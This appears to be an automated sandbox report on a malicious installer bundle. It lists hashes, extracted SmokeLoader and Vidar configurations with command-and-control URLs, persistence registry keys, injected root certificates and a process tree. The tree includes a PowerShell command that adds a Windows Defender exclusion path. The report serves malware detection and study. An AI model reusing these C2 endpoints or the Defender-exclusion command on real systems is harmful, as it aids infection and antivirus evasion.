Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
75s -
max time network
543s -
platform
windows7_x64 -
resource
win7-jp -
submitted
07-09-2021 17:45
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
General
-
Target
setup_x86_x64_install.exe
-
Size
2.9MB
-
MD5
3f1f81101d0ce95fdfac97f5913cd662
-
SHA1
8e615a64e4d72b08926242b7d73a608bdd7e9fce
-
SHA256
90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407
-
SHA512
a776c1f8636ef90d294becf8d09a45366463364026837c19e13227c1c5c9a6656b6fa525e0eec5a1a46997b6ef7066e958c02523a7c4538d046f8b2091145285
Malware Config
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
vidar
40.5
916
https://gheorghip.tumblr.com/
-
profile_id
916
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2112 1268 rundll32.exe 22 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1208 1268 rundll32.exe 22 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
resource yara_rule behavioral1/files/0x0001000000012f0a-119.dat family_socelars behavioral1/files/0x0001000000012f0a-159.dat family_socelars behavioral1/files/0x0001000000012f0a-166.dat family_socelars -
resource yara_rule behavioral1/files/0x0001000000012f0e-105.dat redline -
Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/2812-257-0x0000000000400000-0x0000000002BB2000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x0001000000012f02-69.dat aspack_v212_v242 behavioral1/files/0x0001000000012f02-70.dat aspack_v212_v242 behavioral1/files/0x0002000000012efc-71.dat aspack_v212_v242 behavioral1/files/0x0002000000012efc-72.dat aspack_v212_v242 behavioral1/files/0x0001000000012f04-75.dat aspack_v212_v242 behavioral1/files/0x0001000000012f04-76.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts 46807GHF____.exe -
Executes dropped EXE 37 IoCs
pid Process 1744 setup_installer.exe 1064 setup_install.exe 600 Tue11bc0507b56295.exe 1352 Tue11d7385a978cc.exe 628 Tue11b9d76a96506.exe 1960 Tue11141271fbe5877f.exe 1724 Tue1109eec571ac.exe 348 Tue11b9d76a96506.tmp 324 Tue112c483dd3245d.exe 1028 Tue118f55232e4.exe 2188 Tue11f251db82fb7b.exe 2268 46807GHF____.exe 2316 4701498.exe 2388 5855277.exe 2460 conhost.exe 2476 2234051.exe 2732 Chrome 5.exe 2780 PublicDwlBrowser1100.exe 2812 Alfanewfile2.exe 2844 2.exe 2892 setup.exe 3016 setup_2.exe 3044 3002.exe 1656 setup_2.tmp 1520 iexplore.exe 1472 setup_2.exe 1636 jhuuee.exe 1608 WinHoster.exe 1980 BearVpn 3.exe 2304 setup_2.tmp 1960 6395256.exe 1700 1827316.exe 1100 ultramediaburner.exe 2400 ultramediaburner.tmp 2376 Kagymaelaehae.exe 2788 Gorasyxute.exe 2928 UltraMediaBurner.exe -
Loads dropped DLL 64 IoCs
pid Process 1656 setup_x86_x64_install.exe 1744 setup_installer.exe 1744 setup_installer.exe 1744 setup_installer.exe 1744 setup_installer.exe 1744 setup_installer.exe 1744 setup_installer.exe 1064 setup_install.exe 1064 setup_install.exe 1064 setup_install.exe 1064 setup_install.exe 1064 setup_install.exe 1064 setup_install.exe 1064 setup_install.exe 1064 setup_install.exe 476 cmd.exe 1204 cmd.exe 828 cmd.exe 828 cmd.exe 760 cmd.exe 1352 Tue11d7385a978cc.exe 1524 cmd.exe 1352 Tue11d7385a978cc.exe 1524 cmd.exe 628 Tue11b9d76a96506.exe 628 Tue11b9d76a96506.exe 600 Tue11bc0507b56295.exe 600 Tue11bc0507b56295.exe 1724 Tue1109eec571ac.exe 1724 Tue1109eec571ac.exe 628 Tue11b9d76a96506.exe 1964 cmd.exe 1964 cmd.exe 1060 cmd.exe 348 Tue11b9d76a96506.tmp 348 Tue11b9d76a96506.tmp 348 Tue11b9d76a96506.tmp 1028 Tue118f55232e4.exe 1028 Tue118f55232e4.exe 2124 rundll32.exe 2124 rundll32.exe 2124 rundll32.exe 2124 rundll32.exe 1208 cmd.exe 348 Tue11b9d76a96506.tmp 2388 5855277.exe 2388 5855277.exe 2460 conhost.exe 2460 conhost.exe 2476 2234051.exe 2476 2234051.exe 2460 conhost.exe 2460 conhost.exe 2460 conhost.exe 2460 conhost.exe 2460 conhost.exe 2812 Alfanewfile2.exe 2812 Alfanewfile2.exe 2460 conhost.exe 2892 setup.exe 2460 conhost.exe 3016 setup_2.exe 3016 setup_2.exe 2460 conhost.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 2996 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 5855277.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Uninstall Information\\Ryfiwocema.exe\"" 46807GHF____.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 189 api.2ip.ua 199 api.2ip.ua 60 ip-api.com 187 api.2ip.ua -
Drops file in Program Files directory 9 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\KTHCZPVLMP\ultramediaburner.exe 46807GHF____.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\Uninstall Information\Ryfiwocema.exe.config 46807GHF____.exe File created C:\Program Files\Mozilla Firefox\KTHCZPVLMP\ultramediaburner.exe.config 46807GHF____.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-GO9OB.tmp ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-LVDOC.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\Uninstall Information\Ryfiwocema.exe 46807GHF____.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
pid pid_target Process procid_target 2260 2844 WerFault.exe 72 2888 2812 WerFault.exe 71 1548 2316 WerFault.exe 61 2764 2476 WerFault.exe 65 2424 2232 WerFault.exe 111 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue11bc0507b56295.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue11bc0507b56295.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Tue11bc0507b56295.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2224 schtasks.exe 2056 schtasks.exe 2244 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 580 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 2232 taskkill.exe 2588 taskkill.exe 2644 taskkill.exe 3048 taskkill.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Tue118f55232e4.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 6395256.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 6395256.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 6395256.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Tue118f55232e4.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 7 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 59 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 600 Tue11bc0507b56295.exe 600 Tue11bc0507b56295.exe 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 112 powershell.exe 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 600 Tue11bc0507b56295.exe -
Suspicious use of AdjustPrivilegeToken 60 IoCs
description pid Process Token: SeCreateTokenPrivilege 1028 Tue118f55232e4.exe Token: SeAssignPrimaryTokenPrivilege 1028 Tue118f55232e4.exe Token: SeLockMemoryPrivilege 1028 Tue118f55232e4.exe Token: SeIncreaseQuotaPrivilege 1028 Tue118f55232e4.exe Token: SeMachineAccountPrivilege 1028 Tue118f55232e4.exe Token: SeTcbPrivilege 1028 Tue118f55232e4.exe Token: SeSecurityPrivilege 1028 Tue118f55232e4.exe Token: SeTakeOwnershipPrivilege 1028 Tue118f55232e4.exe Token: SeLoadDriverPrivilege 1028 Tue118f55232e4.exe Token: SeSystemProfilePrivilege 1028 Tue118f55232e4.exe Token: SeSystemtimePrivilege 1028 Tue118f55232e4.exe Token: SeProfSingleProcessPrivilege 1028 Tue118f55232e4.exe Token: SeIncBasePriorityPrivilege 1028 Tue118f55232e4.exe Token: SeCreatePagefilePrivilege 1028 Tue118f55232e4.exe Token: SeCreatePermanentPrivilege 1028 Tue118f55232e4.exe Token: SeBackupPrivilege 1028 Tue118f55232e4.exe Token: SeRestorePrivilege 1028 Tue118f55232e4.exe Token: SeShutdownPrivilege 1028 Tue118f55232e4.exe Token: SeDebugPrivilege 1028 Tue118f55232e4.exe Token: SeAuditPrivilege 1028 Tue118f55232e4.exe Token: SeSystemEnvironmentPrivilege 1028 Tue118f55232e4.exe Token: SeChangeNotifyPrivilege 1028 Tue118f55232e4.exe Token: SeRemoteShutdownPrivilege 1028 Tue118f55232e4.exe Token: SeUndockPrivilege 1028 Tue118f55232e4.exe Token: SeSyncAgentPrivilege 1028 Tue118f55232e4.exe Token: SeEnableDelegationPrivilege 1028 Tue118f55232e4.exe Token: SeManageVolumePrivilege 1028 Tue118f55232e4.exe Token: SeImpersonatePrivilege 1028 Tue118f55232e4.exe Token: SeCreateGlobalPrivilege 1028 Tue118f55232e4.exe Token: 31 1028 Tue118f55232e4.exe Token: 32 1028 Tue118f55232e4.exe Token: 33 1028 Tue118f55232e4.exe Token: 34 1028 Tue118f55232e4.exe Token: 35 1028 Tue118f55232e4.exe Token: SeDebugPrivilege 1960 Tue11141271fbe5877f.exe Token: SeShutdownPrivilege 1296 Process not Found Token: SeDebugPrivilege 112 powershell.exe Token: SeDebugPrivilege 2188 Tue11f251db82fb7b.exe Token: SeDebugPrivilege 2232 taskkill.exe Token: SeShutdownPrivilege 1296 Process not Found Token: SeDebugPrivilege 2316 4701498.exe Token: SeDebugPrivilege 2588 conhost.exe Token: SeDebugPrivilege 2844 2.exe Token: SeDebugPrivilege 2780 PublicDwlBrowser1100.exe Token: SeShutdownPrivilege 1296 Process not Found Token: SeShutdownPrivilege 1296 Process not Found Token: SeShutdownPrivilege 1296 Process not Found Token: SeShutdownPrivilege 1296 Process not Found Token: SeShutdownPrivilege 1296 Process not Found Token: SeDebugPrivilege 2476 2234051.exe Token: SeShutdownPrivilege 1296 Process not Found Token: SeShutdownPrivilege 1296 Process not Found Token: SeDebugPrivilege 1980 BearVpn 3.exe Token: SeShutdownPrivilege 1296 Process not Found Token: SeDebugPrivilege 2260 WerFault.exe Token: SeShutdownPrivilege 1296 Process not Found Token: SeShutdownPrivilege 1296 Process not Found Token: SeDebugPrivilege 2644 taskkill.exe Token: SeShutdownPrivilege 1296 Process not Found Token: SeShutdownPrivilege 1296 Process not Found -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 2400 ultramediaburner.tmp -
Suspicious use of SendNotifyMessage 8 IoCs
pid Process 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found 1296 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1656 wrote to memory of 1744 1656 setup_x86_x64_install.exe 26 PID 1656 wrote to memory of 1744 1656 setup_x86_x64_install.exe 26 PID 1656 wrote to memory of 1744 1656 setup_x86_x64_install.exe 26 PID 1656 wrote to memory of 1744 1656 setup_x86_x64_install.exe 26 PID 1656 wrote to memory of 1744 1656 setup_x86_x64_install.exe 26 PID 1656 wrote to memory of 1744 1656 setup_x86_x64_install.exe 26 PID 1656 wrote to memory of 1744 1656 setup_x86_x64_install.exe 26 PID 1744 wrote to memory of 1064 1744 setup_installer.exe 27 PID 1744 wrote to memory of 1064 1744 setup_installer.exe 27 PID 1744 wrote to memory of 1064 1744 setup_installer.exe 27 PID 1744 wrote to memory of 1064 1744 setup_installer.exe 27 PID 1744 wrote to memory of 1064 1744 setup_installer.exe 27 PID 1744 wrote to memory of 1064 1744 setup_installer.exe 27 PID 1744 wrote to memory of 1064 1744 setup_installer.exe 27 PID 1064 wrote to memory of 1100 1064 setup_install.exe 30 PID 1064 wrote to memory of 1100 1064 setup_install.exe 30 PID 1064 wrote to memory of 1100 1064 setup_install.exe 30 PID 1064 wrote to memory of 1100 1064 setup_install.exe 30 PID 1064 wrote to memory of 1100 1064 setup_install.exe 30 PID 1064 wrote to memory of 1100 1064 setup_install.exe 30 PID 1064 wrote to memory of 1100 1064 setup_install.exe 30 PID 1064 wrote to memory of 476 1064 setup_install.exe 31 PID 1064 wrote to memory of 476 1064 setup_install.exe 31 PID 1064 wrote to memory of 476 1064 setup_install.exe 31 PID 1064 wrote to memory of 476 1064 setup_install.exe 31 PID 1064 wrote to memory of 476 1064 setup_install.exe 31 PID 1064 wrote to memory of 476 1064 setup_install.exe 31 PID 1064 wrote to memory of 476 1064 setup_install.exe 31 PID 1064 wrote to memory of 1204 1064 setup_install.exe 33 PID 1064 wrote to memory of 1204 1064 setup_install.exe 33 PID 1064 wrote to memory of 1204 1064 setup_install.exe 33 PID 1064 wrote to memory of 1204 1064 setup_install.exe 33 PID 1064 wrote to memory of 1204 1064 setup_install.exe 33 PID 1064 wrote to memory of 1204 1064 setup_install.exe 33 PID 1064 wrote to memory of 1204 1064 setup_install.exe 33 PID 1064 wrote to memory of 1208 1064 setup_install.exe 32 PID 1064 wrote to memory of 1208 1064 setup_install.exe 32 PID 1064 wrote to memory of 1208 1064 setup_install.exe 32 PID 1064 wrote to memory of 1208 1064 setup_install.exe 32 PID 1064 wrote to memory of 1208 1064 setup_install.exe 32 PID 1064 wrote to memory of 1208 1064 setup_install.exe 32 PID 1064 wrote to memory of 1208 1064 setup_install.exe 32 PID 1064 wrote to memory of 1524 1064 setup_install.exe 34 PID 1064 wrote to memory of 1524 1064 setup_install.exe 34 PID 1064 wrote to memory of 1524 1064 setup_install.exe 34 PID 1064 wrote to memory of 1524 1064 setup_install.exe 34 PID 1064 wrote to memory of 1524 1064 setup_install.exe 34 PID 1064 wrote to memory of 1524 1064 setup_install.exe 34 PID 1064 wrote to memory of 1524 1064 setup_install.exe 34 PID 1064 wrote to memory of 828 1064 setup_install.exe 35 PID 1064 wrote to memory of 828 1064 setup_install.exe 35 PID 1064 wrote to memory of 828 1064 setup_install.exe 35 PID 1064 wrote to memory of 828 1064 setup_install.exe 35 PID 1064 wrote to memory of 828 1064 setup_install.exe 35 PID 1064 wrote to memory of 828 1064 setup_install.exe 35 PID 1064 wrote to memory of 828 1064 setup_install.exe 35 PID 1100 wrote to memory of 112 1100 cmd.exe 37 PID 1100 wrote to memory of 112 1100 cmd.exe 37 PID 1100 wrote to memory of 112 1100 cmd.exe 37 PID 1100 wrote to memory of 112 1100 cmd.exe 37 PID 1100 wrote to memory of 112 1100 cmd.exe 37 PID 1100 wrote to memory of 112 1100 cmd.exe 37 PID 1100 wrote to memory of 112 1100 cmd.exe 37 PID 1064 wrote to memory of 1464 1064 setup_install.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\7zS0D60B174\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0D60B174\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11d7385a978cc.exe4⤵
- Loads dropped DLL
PID:476 -
C:\Users\Admin\AppData\Local\Temp\7zS0D60B174\Tue11d7385a978cc.exeTue11d7385a978cc.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue11f251db82fb7b.exe4⤵
- Loads dropped DLL
PID:1208 -
C:\Users\Admin\AppData\Local\Temp\7zS0D60B174\Tue11f251db82fb7b.exeTue11f251db82fb7b.exe5⤵
